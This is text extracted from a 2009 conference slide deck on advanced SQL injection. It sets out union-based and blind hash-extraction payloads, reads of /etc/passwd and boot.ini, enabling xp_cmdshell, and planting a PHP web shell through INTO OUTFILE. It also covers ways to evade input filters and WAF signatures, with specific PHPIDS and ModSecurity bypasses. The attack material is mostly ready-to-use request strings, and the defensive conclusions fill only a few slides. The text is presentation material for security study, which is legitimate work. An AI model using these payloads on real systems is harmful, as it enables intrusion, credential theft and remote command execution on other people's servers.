pt devteev advanced sql injection eng 091118184202 phpapp02

8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02

1/62


2/62

Subjects in Question

Introduction to web application security

Classical approach to SQL Injection exploitation

Blind SQL Injection

Working with file system and executing commands on serverunder SQL Injection exploitation

Methods to bypass program security filters

Methods to bypass a Web Application Firewall (WAF)

Conclusions


3/62

Introduction to Web Application Security


4/62

Unsafe World of Web Applications

According to the statistics collected by PositiveTechnologies in 2008,

83% of sites contain critical vulnerabilities

78% of sites contain vulnerabilities of moderate risk level

the probability to infect the pages of a vulnerable webapplication with malicious code automatically is about 15-20%

http://ptsecurity.ru/analytics.asp

The data is based on automatic scanning of 16121 systems, detailed analysis of 59 web applications

including analysis of the source code of over 10 applications.


5/62


6/62

Chapter 1: SQL Injection Vulnerability

Classical Approach to SQL Injection Exploitation


7/62

Illustrative Example of SQL Injection

Web Server DBMShttp://web/?id=6329&print=Y

.

SELECT * from news where id = 6329.


8/62

Illustrative Example of SQL Injection

Web Server DBMShttp://web/?id=6329+union+select+id,pwd,0+from...

.

SELECT * from news where id = 6329 union select id,pwd,0 from.


9/62

SQL Injection Basic Concepts

SQL Injection

A method to attack a database bypassing firewalls. In thismethod, parameters transmitted to the database via webapplications are modified so that the executable SQL requestchanges.

There are two types of SQL Injection

SQL Injection into a string parameter

Examples:

SELECT * from table where name = "$_GET['name']"

SELECT id, acl from table where user_agent ='$_SERVER["HTTP_USER_AGENT"]'

SQL Injection into a numeric parameter

Examples:SELECT login, name from table where id = $_COOKIE["id"]

SELECT id, news from table where news = 123 limit $_POST["limit"]


10/62


Methods of SQL Injection exploitation are classified

according to the DBMS type and exploitation conditions

Vulnerable request can implement Insert, Update, Delete

It is possible to inject SQL code into any part of SQL request

Blind SQL Injection

Features of SQL implementations used in various DBMSs

SQL Injection vulnerability is characteristic not only for webapplications!


11/62


SQL Injection classification

SQL Injection can be exploited both during the attack conductionor after a while


12/62


Methods to detect SQL Injection

Function testing (black/white-box)

Fuzzing

Static/dynamic/manual analysis of the source code

Examples of function testing for http://site/?param=123

http://site/?param=1' http://site/?param=1'#

http://site/?param=1"

http://site/?param=1 order by 1000 http://site/?param=1 AND 1=1--

http://site/?param=1'-- http://site/?param=1 AND 1=2--

...

http://site/?param=1'/* http://site/?param=1' AND '1'='1

... etc.


13/62

SQL Injection Classical Exploitation (MySQL)

Vulnerability detection

/?id=1+ORDER+BY+100

SQL request looks like

SELECT id, name from table where id =1 ORDER BY 100

As a result, the following error message can be received

ERROR 1054 (42S22): Unknown column '100' in 'order clause'

Obtaining table/column names (information_schema/search) and furtherobtaining data from the discovered tables

/?id=1+union+select+0,concat_ws(0x3a,table_name,column_name)+from+information_schema.columns

SQL request becomes

SELECT id, name from table where id =1 union select

0,concat_ws(0x3a,table_name,column_name) from information_schema.columns

As a result, the desired information can be received in the following form

| 0 | table1:column1 || 0 | table1:column2 |


14/62

SQL Injection Features of Different DBMSs

Features of exploitation for different DBMSExample (MySQL): SELECT * from table where id = 1 union select 1,2,3Example (PostgreSQL): SELECT * from table where id = 1; select 1,2,3Example (Oracle): SELECT * from table where id = 1 union select null,null,null from sys.dual

MySQL MSSQL MS Access Oracle DB2 PostgreSQL

String concatenationconcat(,)

concat_ws(delim,)' '+' ' " "&" " ' '||' '

'' concat ''

" "+" "

' '||' '

' '||' '

Comments -- and /**/ and # -- and /* No -- and /* -- -- and /*

Request union union union and ; union union union union and ;

Sub-requests v.4.1 >= Yes No Yes Yes Yes

Stored procedures No Yes No Yes No Yes

Availability of

information_schema or its analogsv.5.0 >= Yes Yes Yes Yes Yes


15/62

SQL Injection Exploitation for Different DBMSs

MySQL 4.1>=

First entry/?id=1 union select name,123 from users limit 0,1 Second entry/?id=1 union select name,123 from users limit 1,1

MSSQL

First entry/?id=1 union select table_name,123 from (select row_number() over (order by name) as

rownum, name from users) as t where t.rownum=1

Second entry/?id=1 union select table_name,123 from (select row_number() over (order by name) as

rownum, name from users) as t where t.rownum=2

PostgreSQL

First entry/?id=1 union select name, null from users limit 1 offset 0 Second entry/?id=1 union select name, null from users limit 1 offset 1

or

First entry/?id=1; select name, 123 from users limit 1 offset 0 Second entry/?id=1; select name, 123 from users limit 1 offset 1


16/62

Chapter 2: Blind SQL Injection

Blind SQL Injection


17/62

Blind SQL Injection Basic Concepts

Blind SQL Injection

A method to attack a database bypassing firewalls. In the courseof exploitation of an SQL Injection vulnerability, the attackeranalyses the application logic (true/false).

Blind SQL Injections can be classified according to thefollowing criteria


18/62

Blind SQL Injection Basic Concepts

Methods to detect Blind SQL Injection

http://site/?param=-1 OR 1=1http://site/?param=-1 OR 1=1--...http://site/?param=-1'http://site/?param=-1' AND 1=2...http://site/?param=-1' OR '1'='1...http://site/?param=-1"/*...

http://site/?param=2http://site/?param=1http://site/?param=2-1...http://site/?param=1' AND 1=1http://site/?param=1' AND '1'='1etc.

Methods to detect Double Blind SQL Injection

http://site/?param=-1 AND benchmark(2000,md5(now()))...http://site/?param=-1' AND benchmark(2000,md5(now()))--...etc.


19/62

Blind SQL Injection Classical Exploitation (MySQL)

Searching for the first character of the first table entry

/?id=1+AND+555=if(ord(mid((select+pass+from+users+limit+0,1 ),1,1))=97,555,777)

SQL request becomes

SELECT id, name from table where id =1 AND 555=if(ord(mid((select pass from userslimit 0,1),1,1))=97,555,777)

If the table users contains a column pass and the first character of the first entryin this column is 97 (letter a), then DBMS will return TRUE; otherwise, FALSE.

Searching for the second character of the first table entry

/?id=1+AND+555=if(ord(mid((select+pass+from+users+limit+0,1), 2,1))=97,555,777)

SQL request becomes

SELECT id, name from table where id =1 AND 555=if(ord(mid((select pass from userslimit 0,1),2,1))=97,555,777)

If the table users contains a column pass and the second character of the firstentry in this column is 97 (letter

a) , then DBMS will return TRUE; otherwise, FALSE.


20/62

Blind SQL Injection Classical Exploitation (MySQL)Lets go faster

We can restrict the range of character search. For example, for MD5 it is [0-9a-f], or 48-57, 97-102. Moreover, we can use the inequality signs!


/?id=1+AND+555=if(ord(lower(mid((select+pass+from+users+limit+0,1),1,1)))>97,555,777)

If the table users contains a column pass and the first character of the first entryin this column is greater than 97 (letter a), then DBMS will return TRUE; otherwise,FALSE.

Searching for the first character of the second table entry

/?id=1+AND+555=if(ord(lower(mid((select+pass+from+users+limit+1,1),1,1)))


21/62

Blind SQL Injection New Methods of Exploitation(MySQL) and even faster

It is possible to find up to 12 characters using one request (method by QwazarX0709)


/?id=1+AND+1+rlike+concat(if((mid((select+pass+from+users+limit+0,1),1,1)in('0'))>0,

(0x787B312C3235367D),if((mid((select+pass+from+users+limit+0,1),1,1)in('1'))>0,

(0x787B312C28),if((mid((select+pass+from+users+limit+0,1),1,1)in('2'))>0,

(0x5B5B3A5D5D),if((mid((select+pass+from+users+limit+0,1),1,1)in(' 3'))>0,

(0x5B5B),if((mid((select+pass+from+users+limit+0,1),1,1)in('4'))>0,

(0x28287B317D),if((mid((select+pass+from+users+limit+0,1),1,1)in('5'))>0,

(0x0),if((mid((select+pass+from+users+limit+0,1),1,1)in('6'))>0,

(0x28),if((mid((select+pass+from+users+limit+0,1),1,1)in('7'))>0,

(0x5B322D315D),if((mid((select+pass+from+users+limit+0,1),1,1)in('8'))>0,

(0x5B5B2E63682E5D5D),if((mid((select+pass+from+users+limit+0,1),1,1)in('9'))>0,

(0x5C),if((mid((select+pass+from+users+limit+0,1),1,1)in('a'))>0,

(select 1 union select 2),(1)))))))))))))

If the table users contains a column pass and the first character of the first entry inthis column belongs to the range [0-9a], then DBMS will return an error message.Otherwise, it will return 1, i.e. the request will be correct.


22/62

Blind SQL Injection New Methods of Exploitation(MySQL) at the same rate

How does it work?

MySQL returns unique error messages using illegal regexps:

select 1 regexp if(1=1,"x{1,0}",2)

#1139 - Got error 'invalid repetition count(s)' from regexp

select 1 regexp if(1=1,"x{1,(",2)

#1139 - Got error 'braces not balanced' from regexp

etc.

An error message is also displayed if two entries are unexpectedlyreturned instead of one (method by Elekt):

select if(1=1,(select 1 union select 2),2)

#1242 - Subquery returns more than 1 row

Note: in the example, hexadecimal equivalents were used, e.g. 0x787B312C307D instead x{1,0}


23/62

Blind SQL Injection New Methods of Exploitation(MySQL) at the same rate

If it is necessary to find an MD5 hash, only two requests are required.

Request1

/?id=1+AND+1+rlike+concat(if((mid((select+pass+from+users+limit+0,1),1,1)in('0'))>0,(0x787B312C3235367D),if((mid((select+pass+from+users+limit+0,1),1,1)in('1'))>0,(0x787B312C28),if((mid((select+pass+from+users+limit+0,1),1,1)in('2'))>0,(0x5B5B3A5D5D),if((mid((select+pass+from+users+limit+0,1),1,1)in('3'))>0,(0x5B5B),if((mid((select+pass+from+users+limit+0,1),1,1)in('4'))>0,(0x28287B317D),if((mid((select+pass+from+users+limit+0,1),1,1)in('5'))>0,(0x0),if((mid((select+pass+from+users+limit+0,1),1,1)in('6'))>0,(0x28),if((mid((select+pass+from+users+limit+0,1),1,1)in('7'))>0,(0x5B322D315D),if((mid((select+pass+from+users+limit+0,1),1,1)in('8'))>0,(0x5B5B2E63682E5D5D),if((mid((select+pass+from+users+limit+0,1),1,1)in('9'))>0,(0x5C),if((mid((select+pass+from+users+limit+0,1),1,1)in('a'))>0,(select 1 unionselect 2),(1)))))))))))))

If the character does not belong to the range [0-9a], then the second requestis sent (checking [b-f])

/?id=1+AND+1+rlike+concat(if((mid((select+pass+from+users+limit+0,1),1,1)in('0'))>0,(0x787B312C3235367D),if((mid((select+pass+from+users+limit+0,1),1,1)in('1'))>0,(0x787B312C28),if((mid((select+pass+from+users+limit+0,1),1,1)in('2'))>0,(0x5B5B3A5D5D),if((mid((select+pass+from+users+limit+0,1),1,1)in('3'))>0,(0x5B5B),if((mid((select+pass+from+users+limit+0,1),1,1)in('4'))>0,(0x28287B317D),if((mid((select+pass+from+users+limit+0,1),1,1)in('5'))>0,(0x0),if((mid((select+pass+from+users+limit+0,1),1,1)in('6'))>0,(0x28),if((mid((select+pass+from+users+limit+0,1),1,1)in('7'))>0,(0x5B322D315D),if((mid((select+pass+from+users+limit+0,1),1,1)in('8'))>0,(0x5B5B2E63682E5D5D),if((mid((select+pass+from+users+limit

+0,1),1,1)in('9'))>0,(0x5C),if((mid((select+pass+from+users+limit+0,1),1,1)in('a'))>0,(select 1 unionselect 2),(1)))))))))))))


24/62

Blind SQL Injection New Methods of Exploitation(MySQL) at the maximal rate!

A new method using function ExtractValue() based on experimentswith function NAME_CONST() MySQL v. 5.0.12 > v.5.0.64 (X0909)conducted by Qwazar:

select 1 AND ExtractValue(1,concat(0x5C,('test')));

As a result, the following error message can be received (if MySQL version is >=5.1)

XPATH syntax error: '\test'

Thus, we can simply return the desired data:

/?id=1+AND+extractvalue(1,concat(0x5C,(select pass from users limit 0,1)))

SQL request becomes

SELECT id, name from table where id =1 AND extractvalue(1,concat(0x5C,(select passfrom users limit 0,1)))

As a result, the desired information can be received in the following form

The error message string cannot contain more than 31 characters. Function mid() andsuch-like can be applied to display longer strings.


25/62

Blind SQL Injection New Methods of Exploitation(MySQL) The Rate Limit

What if error messages are suppressed?

We can restrict the range of character search. For example, for MD5 this rangeis [0-9a-f].

We can use news titles, site sections etc. as signatures.

Implementation:

/?id=if((mid((select pwd from users limit 0,1),1,1)in('a'))>0,(12345),if((mid((select pwdfrom users limit 0,1),1,1)in('b'))>0,(12346), .. ,null))

or

/?id=if((mid((select pwd from users limit0,1),1,1)in('a','b','c','d','e','f'))>0,(12345),if((mid((select pwd from users limit0,1),1,1)in('0','1','2','3','4','5','6','7','8','9'))>0,(12346), .. ,null))

In this example, 12345 and 123456represent identifiers of news on the site.

Restrictions of this method: Appropriate application architecture;

The length of HTTP request cannot be more than 4096 bytes.


26/62

Double Blind SQL Injection Classical Exploitation(MySQL) More haste, less speed;)

Exploitation of Double Blind SQL Injection is based on time delays.

We can restrict the range of character search to increase performance.

Classical implementation:

/?id=1+AND+if((ascii(lower(substring((select password from user limit0,1),0,1))))=97,1,benchmark(2000000,md5(now())))

We can conjecture that the character was guessed right on the basis of the time delayof web server response;

Manipulating the value 2000000: we can achieve acceptable performance for aconcrete application;

Function sleep() represents an analogue of function benchmark(). Function sleep() ismore secure in the given context, because it doesnt use server resources.


27/62

Chapter 3: Working with File System and ExecutingCommands on Server

Working with File System and Executing Commands onServer Under SQL Injection Exploitation


28/62

Working with File System

General architecture of using file system via SQL

Injection

uid=80(www) gid=80(www) If you access a file created by DBMS, it is

necessary to keep in mind that the file owneris the user called DBMS

uid=88(mysql) gid=88(mysql) Requests are received from the DBMS user (to

work with file system, privileges file_priv arerequired)

File system is accessed by the DBMS user(appropriate permissions are required at theACL level)

Current directory represents the DBMSdirectory


29/62

Working with File System Difference of DBMSs

An example for MSSQL:

CREATE TABLE mydata (line varchar(8000));

BULK INSERT mydata FROM 'c:\boot.ini';

SELECT * FROM mydata;

DROP TABLE mydata;

MySQL MSSQL MS Access Oracle PostgreSQL

Built-in functions Yes No Yes No Yes

Available functions

load_file, load data

infile, into

otfile/dumpfile

Procedures

eq insert

from file

curdir()

Procedures

eq insert

from file

pg_read_file(),

pg_ls_dir(), copy,

etc.


30/62

Working with File System

An example for MySQL

LOAD_FILE union select load_file('/etc/passwd')

LOAD DATA INFILE

create table t(a varchar(500)); load data infile '/etc/passwd' into table t;

select a from t;

SELECT INTO OUTFILE SELECT INTO DUMPFILE union select 1 into outfile 't'

union select 1 into dumpfile 't'


31/62

Executing Commands on Server Difference of DBMSs

An example for MSSQL:EXEC xp_cmdshell 'ipconfig /all';

To use xp_cmdshell in MSSQL >= 2005, it is necessary toperform the following:

EXEC sp_configure 'show advanced options', 1;

RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;

RECONFIGURE;

MySQL MSSQL MS Access Oracle PostgreSQL

Built-in functions No Yes Yes No No

aila le functions No EXE s ell()Own

proceduresOwn procedures


32/62

Executing Commands on Server

An example for SQL

Writing web-shell to the file /www/img/shell.php

/?id=1+union+select+''+into+outfile+'/www/img/shell.php'

Executing commands on server

/img/shell.php?shell=passthru('ls');


33/62

Chapter 4: Methods to Bypass Security Filters

Methods to Bypass Security Filters


34/62

Filters for Incoming data. Types

Transparent for web applications

magic_quotes_gpc, display_errors, etc.

mod_rewrite, ISAPI filters, etc.

Built-in functions of the development language

Universal

Example: addslashes(), addcslashes(), htmlspecialchars(), etc

Meant for a certain environmentExample: mysql_real_escape_string(), pg_escape_string(),dbx_escape_string(), etc

In-house design of a programmer

Type casting

Using regular expressions


35/62

Methods to Bypass Security Filters (1)

Apply coding to the data transmitted to the application

There is unlimited number of forms to represent the stringqwerty

Hex coding: 0x717765727479

ASCII representation: char(113),char(119),char(101),char(114),char(116),char(121)

Encryption with various keys: i~)=

Example:

hex(AES_ENCRYPT('qwerty',1)) is B969A9A01DA8E78FA8DD7E299C9CF23D

aes_decrypt(concat(0xB9,0x69,0xA9,0xA0,0x1D,0xA8,0xE7,0x8F,0xA8,0xDD,0x7E,0x29,0x9C,0x9C,0xF2,0x3D),1) is qwerty


36/62


Apply codes that are not processed by the filter

Function synonyms

CHARACTER_LENGTH() -> CHAR_LENGTH()

LOWER() -> LCASE()

OCTET_LENGTH() -> LENGTH()

LOCATE() -> POSITION()

REGEXP() -> RLIKE()

UPPER() -> UCASE()

etc.

Obfuscated codes for requests and data

Examples of obfuscated codes for the string qwerty:

reverse(concat(if(1,char(121),2),0x74,right(left(0x567210,2),1),lower(mid('TEST',2,1)),replace(0x7074,'pt','w'),char(instr(123321,33)+110)))

concat(unhex(left(crc32(31337),3)-400),unhex(ceil(atan(1)*100-2)),unhex(round(log(2)*100)-4),char(114),char(right(cot(31337),2)+54),char(pow(11,2)))


37/62

Methods to Bypass Security Filters

An example of bypassing signatures (obfuscated code for

request)

The following request will correspond to the applicationsignature

/?id=1+union+(select+1,2+from+test.users)

But sometimes the signatures can be bypassed

/?id=1+union+(select+'xz'from+xxx)

/?id=(1)unIon(selEct(1),mid(hash,1,32)from(test.users))

/?id=1+union+(sELect'1',concat(login,hash)from+test.users)

/?id=(1)union(((((((select(1),hex(hash)from(test.users))))))))

/?id=(1);exec('sel'+'ect'(1))

/?id=(1)or(0x50=0x50)


38/62


Use null-byte to bypass binary-dependent functions

Example: if(ereg ("^(.){1,3}$", $_GET['param'])) { }

/?param=123

ereg ("^(.){1,3}$", "123") true

/?param=1234

ereg ("^(.){1,3}$", "1234") false

/?param=1+union+select+1

ereg ("^(.){1,3}$", "1 union select 1") false

/?param=123%00

ereg ("^(.){1,3}$", "123\0") - true

/?param=1/*%00*/union+select+1

ereg ("^(.){1,3}$", "1/*\0*/union select 1") - true


39/62


Bypassing function addslashes()

It is possible if there is a vulnerability that allows attackers to setSJIS, BIG5 or GBK coding

How does it work?

addslashes("'") .. 0x27 "\'" .. 0x5c27

An example for GBK coding:

0xbf27 illegal character

0xbf5c valid independent character

0xbf27, being processed with function addslashes(), becomes 0xbf5c27,i.e. 0xbf5c and a single quote 0x27

Raz0r, http://raz0r.name/vulnerabilities/sql-inekcii-svyazannye-s-multibajtovymi-kodirovkami-i-

addslashes/


40/62


A common vulnerability in the functions of security filters

The following request doesnt allow malicious users to conduct an attack

/?id=1+union+select+1,2,3/*

If there is a corresponding vulnerability in the filter, the following requestwill be successfully processed

/?id=1+un/**/ion+sel/**/ect+1,2,3--

SQL request becomes

SELECT * from table where id =1 union select 1,2,3--

Any set of characters that is cut by the filter (e.g. #####, %00, etc.) can be usedinstead of /**/

The given example works in case of "superfluous cleaning" of incoming data(replacing regexp with an empty string)


41/62

Chapter 5: Methods to Bypass Web Application Firewall

Methods to Bypass Web Application Firewall (WAF)


42/62

What is WAF

http://server/?id=6329&print=Y

At attack is detected!

Alarm!!!

WAF Webserverhttp://server/?id=5351

http://server/?id=8234

http://server/?id=>...

http://server/?id=1+union+select...

http://server/?id=/../../../etc/passwd

Data normalizationDecode HTML entities (e.g. c, ", )

Escaped characters (e.g. \t, \001, \xAA, \uAABB)

Null byte string termination...

Signature search

/(sel)(ect.+fr)(om)/is

/(uni)(on.+sel)(ect)/is

...


43/62

Classification

According to the behavior:

Bridge/Router

Reverse Proxy

Built-in

According to the protection model:

Signature-based

Rule-based

According to the response to a bad request:

Cleaning of dangerous data

Blocking the request

Blocking the attack source


44/62

Methods to Bypass WAF

Fundamental technology limitations

Inability to protect a web-application from all possiblevulnerabilities

General problems

When using universal WAF-filters, it is necessary to balance thefilter efficiency and minimization error responses, when validtraffic is blocked

Processing of the traffic returned to a client

Implementation Vulnerabilities

Normalization techniques

Application of new methods of web vulnerability exploitation(HTTP Parameter Pollution, HTTP Parameter Fragmentation, null-byte replacement, etc.)


45/62


46/62

Practice of Bypassing WAF: SQL Injection HPP(example 1)

Using HTTP Parameter Pollution (HPP)

The following request doesnt allow anyone to conduct an attack

/?id=1;select+1,2,3+from+users+where+id=1--

This request will be successfully performed using HPP

/?id=1;select+1&id=2,3+from+users+where+id=1--

Successful conduction of an HPP attack bypassing WAFdepends on the environment of the application beingattacked

OWASP EU09 Luca Carettoni, Stefano diPaola

http://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf


47/62

Practice of Bypassing WAF: SQL Injection HPP

How does it work?


48/62


49/62

Practice of Bypassing WAF: SQL Injection HPP(example 2)

Using HTTP Parameter Pollution (HPP)

Vulnerable code

SQL="select key from table where id="+Request.QueryString("id")

This request is successfully performed using the HPP technique

/?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&i

d=*/users

The SQL request becomes

select key from table whereid=1/**/union/*,*/select/*,*/pwd/*,*/from/*,*/users

Lavakumar Kuppan,http://lavakumar.com/Split_and_Join.pdf


50/62

Practice of Bypassing WAF: SQL Injection HPF

Using HTTP Parameter Fragmentation (HPF)

Vulnerable code example

Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']);

Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." limit".$_GET['c']);

The following request doesnt allow anyone to conduct an attack

/?a=1+union+select+1,2/*

These requests maybe successfully performed using HPF

/?a=1+union/*&b=*/select+1,2

/?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--

The SQL requests become

select * from table where a=1 union/* and b=*/select 1,2

select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users--

http://www.webappsec.org/lists/websecurity/archive/2009-08/msg00080.html


51/62

Practice of Bypassing WAF: Blind SQL Injection

Using logical requests AND/OR

The following requests allow one to conduct a successful attack for manyWAFs

/?id=1+OR+0x50=0x50

/?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74

Negation and inequality signs (!=, , ) can be used instead of the

equality one It is amazing, but many WAFs miss it!It becomes possible to exploit the vulnerability with the method of blind-SQLInjection by replacing SQL functions that get to WAF signatures with theirsynonyms

substring() -> mid(), substr(), etc

ascii() -> hex(), bin(), etc

benchmark() -> sleep()

The given example is valid for all WAFs whose developers aim to cover asmany web-applications as possible


52/62


Known:

substring((select 'password'),1,1) = 0x70

substr((select 'password'),1,1) = 0x70

mid((select 'password'),1,1) = 0x70

New:

strcmp(left('password',1), 0x69) = 1

strcmp(left('password',1), 0x70) = 0

strcmp(left('password',1), 0x71) = -1

STRCMP(expr1,expr2) returns 0 if the strings are the same, -1 if the firstargument is smaller than the second one, and 1 otherwise

http://dev.mysql.com/doc/refman/5.0/en/string-comparison-functions.html


53/62


Blind SQL Injection doesnt always imply use of AND/OR!

Vulnerable code examples

Query("select * from table where uid=".$_GET['uid']);

Query("select * from table where card=".$_GET['card']);

Exploitation examples

false: index.php?uid=strcmp(left((select+hash+from+users+limit+0,1),1),0x42)%2B112233

false: index.php?uid=strcmp(left((select+hash+from+users+limit+0,1),1),0x61)%2B112233

true: index.php?uid=strcmp(left((select+hash+from+users+limit+0,1),1),0x62)%2B112233

first hash character = B

false: ...

false: index.php?uid=strcmp(left((select/**/hash/**/from/**/users/**/limit/**/0,1),2),0x6240)%2B112233

true: index.php?uid=strcmp(left((select/**/hash/**/from/**/users/**/limit/**/0,1),2),0x6241)%2B112233

second hash character = A


54/62

Practice of Bypassing WAF: SQL Injection SignatureBypass

PHPIDS (0.6.1.1) default rules

Forbid: /?id=1+union+select+user,password+from+mysql.user+where+user=1

But allows: /?id=1+union+select+user,password+from+mysql.user+limit+0,1

Forbid: /?id=1+OR+1=1

But allows: /?id=1+OR+0x50=0x50

Forbid: /?id=substring((1),1,1)

But allows: /?id=mid((1),1,1)


55/62

Practice of Bypassing WAF: SQL Injection SignatureBypass

Mod_Security (2.5.9) default rules

Forbid:/?id=1+and+ascii(lower(substring((select+pwd+from+users+limit+1,1),1,1)))=74

But allows:/?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74

Forbid: /?id=1+OR+1=1

But allows: /?id=1+OR+0x50=0x50

Forbid: /?id=1+and+5=6

But allows: /?id=1+and+5!=6

Forbid: /?id=1;drop members

But allows: /?id=1;delete members

And allows: /?id=(1);exec('sel'+'ect(1)'+',(xxx)from'+'yyy')


56/62

Conclusions


57/62

SQL Injection in wildlife

SQL Injection can be found even in widely known andlarge Internet resources


58/62

Conclusions

SQL Injection is a gross programming error, which iswidespread and very dangerous

WAF is not the long-expected silver bullet

WAF doesnt eliminate a vulnerability, it just partly screensthe attack vector

Conceptual problems of WAF application of the signature

principle

Correctly organized Software Development Life Cycle(SDLC) considerably reduces the probability that avulnerability will appear in program code

Web application protection (and information security inwhole) must be comprehensive :)


59/62

Automated Exploitation of SQL Injection

sqlmap (http://sqlmap.sourceforge.net/) Full support: MySQL, Oracle, PostgreSQL Microsoft SQL Server

Partial support: Microsoft Access, DB2, Informix, Sybase Interbase

sqlus (http://sqlsus.sourceforge.net/) Only MySQL support is implemented

bsqlbf-v2 (http://code.google.com/p/bsqlbf-v2/ It isnt oriented on Blind SQL Injections any more. The following

systems are supported: MySQL, Oracle, PostgreSQL, and MicrosoftSQL Server

In view of development of new fast techniques of Blind SQL

Injection exploitation in MySQL, they are going to release acorresponding proof of concept (it will be available onhttp://www.milw0rm.com/papers/)


60/62

Automatic detection of SQL Injection


61/62


62/62

Thank you for yourattention!

[email protected]://devteev.blogspot.com/

pt devteev advanced sql injection eng 091118184202 phpapp02

Documents